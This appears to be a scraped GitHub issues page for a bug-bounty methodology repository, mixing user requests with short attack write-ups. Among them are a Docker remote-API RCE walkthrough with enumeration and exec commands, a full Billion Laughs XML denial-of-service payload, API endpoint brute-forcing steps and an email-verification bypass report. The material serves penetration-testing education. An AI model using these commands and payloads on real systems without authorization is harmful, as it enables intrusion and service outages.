kathanp19 / howtohunt Goto Github PK

Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf

So in this file upload automate the porcess of uploading file https://github.com/jonaslejon/malicious-pdf
on this tool

If it is possible, could you please add following vulnerable app in your repos?
https://github.com/anil-yelken/Vulnerable-Soap-Service
https://github.com/anil-yelken/Vulnerable-Flask-App

$ cat domains | httpx | tee -a alive
Usage: httpx [OPTIONS] URL

Error: Missing argument 'URL'.

Do you have another method to run this?

This button.

Docker API unauthorized RCE

Docker is an open-source platform for developers and other IT professionals to help build, ship, and run distributed applications.
the docker daemon (dockerd) provides an API service used for remote control of docker service the default daemon listen on Unix /var/run/docker.sock and when bound to a public interface can be used by an attacker to compromise container system due to lack of default authentication

Background concept:

1. The host is running docker: daemon bound to the external interface with no access control or authentication
2. Attacker uses docker API function to enumerate manage and control the container service the attacker is able to control existing deployed container or create another one.
3. Docker API provides JSON response containing the output of command issued.

Enumerating docker API services
By default, the Docker host remote API listens on ports 2375 / 2376 and has no authentication. If the port is not blocked, docker host APIs can be accessed over the public internet.

nmap IP:2375/2376
nmap -p- IP
nmap -Pn -p 2375 IP
nmap -sV -p 2375 IP

To confirm that the docker is service is running on the target we can give the string in the browser and check the response
ex: https://IP:2375
we will receive a response something like this
{"message":"page not found"}
and to confirm the version details we can use this
https://IP:2375/version

The command used to exploit

This command is used to get all the information about the docker container
docker -H IP:2375 info

List all the running containers
docker -H IP:2375 ps

List all the stopped containers
docker -H IP:2375 ps -a

RCE for Docker
command for RCE
docker -H IP:2375 exec -it container_name /bin/bash

Billion Laugh Attack

Another common vulnerability associated with XML parsing is called A Billion Laughs Attack. It uses an entity to resolve itself cyclically thereby consuming more CPU usage and causing a denial of service attack. An Example XML payload that can cause an XXE attack is as follows:

Step 1 : Capture the request into Burp
Step 2 : Send it to the repeater tab and then convert the body into XML whether it is accepting or not
Step 3 : To confirm, Check for the [ Accept ] Header change it into Application/json
Step 4 : Covert JSON into XML if their is no Possibility
Step 5 : Add the payload in between and change the content lol1 to lol9 depending on the dos variation in the xml field!

Billion Laugh Payload :

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz> 

I wanna suggest that this awesome project could be hosted with mdwiki, and then we'll get a readable web wiki page totally powered by the front end.
It's much easier and friendly to read or negavite.

Hidden API Functionality Exposure

Application programming interfaces (APIs) have become a critical part of almost every business. APIs are responsible for transferring information between systems within a company or to external companies. For example, when you log in to a website like Google or Facebook, an API processes your login credentials to verify they are correct.

• Swagger UI Documentation
• Dictionary Attack | Brute force
• Common wordlist for API Enum :
• https://wordlists.assetnote.io/
• https://github.com/Net-hunter121/API-Wordlist

Steps to Perform This Attack :

Step 1 : Capture the request into Burp, Send the request to repeater and intruder tab
Step 2 : Add the endpoint into the intruder tab and add the payload from the word-list
Step 3 : 1st use dictionary attack with sec-list on the Endpoint
Step 4 : Either use your customized list or use the ones which i have provided in the above section
Step 5 : Then simply start the attack, Start checking for 200 status
Step 7 : Once their is 200 status OK, Start the recursive scan on the same endpoint for juicy information like swagger doc and so on.
step 8 : Other method is to change the API version and try bruteforcing the same endpoint
Eg: Redacted.com/api/v1/{Endpoint} ----- Redacted.com/api/v2/{Endpoint}

Note: Their will be minimum limits per request which will be assigned without API keys so make sure to utilize manual approach as much as you can,Then the rest can be automated for scanning the vulnerability in API with automated tools

In this book, here is the one topic which is related to Session Hijacking. As I observed this is another issue Session not expired after logout not a session hijacking

"Session Hijacking(Intended Behavior)
Steps:
1.Create your account
2.Login your account
3.Use cookie editor extension in browser
4.Copy all the target cookies
5.Logout your account
6.Paste that cookies in cookie editor extension
7.Refresh page if you are logged in than this is a session hijacking"

URl - https://github.com/KathanP19/HowToHunt/blob/master/Broken_Auth_And_Session_Management/Session_based_bugs.md

Please fix this in the book. Thanks

Bug Description:
During sign up we need to verify the email but we can bypass the verification by just clicking the remember me button and changing the URL path.

Steps to reproduce:

1. Go to https://dashboard.example.com/signup and create a dummy account.
2. You will be asked to verify the account and the URL will be- https://dashboard.example.com/signup/pending/uri849hfjhd.
3. Now simply remove the /signup/pending/uri849hfjhd and make the URL- https://dashboard.example.com/
4. Now you will be redirected to https://dashboard.example.com/login
5. Enter the email/password that you used to create the account in step 1.
6. Click on 'remember me' button and click on Login.
7. Now you will again redirected to this path- https://dashboard.example.com/signup/pending/uri849hfjhd
8. Simply follow the above step 3[remove /signup... path in the URL and make it https://dashboard.example.com/] and you will be logged into the account without email verification.

Impact:
Email verification bypass could enable an attacker to do pre-account takeover and he can create any number of dummy accounts.

Recommendation:
Remember me functionality must verify whether the account is verified or not.

POC:
Please let me know how can I share the POC video privately because the bug is still not fixed on the application which I found on.

There is some missing content from chapter 1 to11 .

Hi,
I find this github page super helpful. I have a bug idea and would like to contribute. Thanks!
Html-injection.txt